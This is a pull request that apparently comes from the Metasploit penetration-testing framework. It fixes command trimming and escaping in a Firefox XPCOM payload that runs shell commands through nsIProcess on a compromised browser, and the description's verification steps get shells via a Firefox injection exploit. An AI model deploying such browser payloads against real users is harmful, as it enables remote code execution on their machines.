### PR TITLE
Fix bug in Firefox XPCOM payload on Linux

### DIFF
--- a/lib/msf/core/payload/firefox.rb
+++ b/lib/msf/core/payload/firefox.rb
@@ -175,14 +175,16 @@ module Msf::Payload::Firefox
         stdout.append(stdoutFile);
 
         var shell;
+        cmd = cmd.trim();
         if (windows) {
-          shell = shPath+" "+cmd.trim();
+          shell = shPath+" "+cmd;
           shell = shPath+" "+shell.replace(/\\W/g, shEsc)+" >"+stdout.path+" 2>&1";
           var b64 = svcs.btoa(shell);
         } else {
           shell = shPath+" "+cmd.replace(/\\W/g, shEsc);
           shell = shPath+" "+shell.replace(/\\W/g, shEsc) + " >"+stdout.path+" 2>&1";
         }
+
         var process = Components.classes["@mozilla.org/process/util;1"]
           .createInstance(Components.interfaces.nsIProcess);
         var sh = Components.classes["@mozilla.org/file/local;1"]


### PR DESCRIPTION
A similar bug existed a while ago with Windows, escaping the linefeed after a command screws things up on Linux. OSX is somehow unaffected.
#### Verification
- [x] Get a shell with `multi/browser/firefox_webidl_injection` on Windows, OSX, and Linux
- [x] Ensure you can run `whoami` on each session successfully.
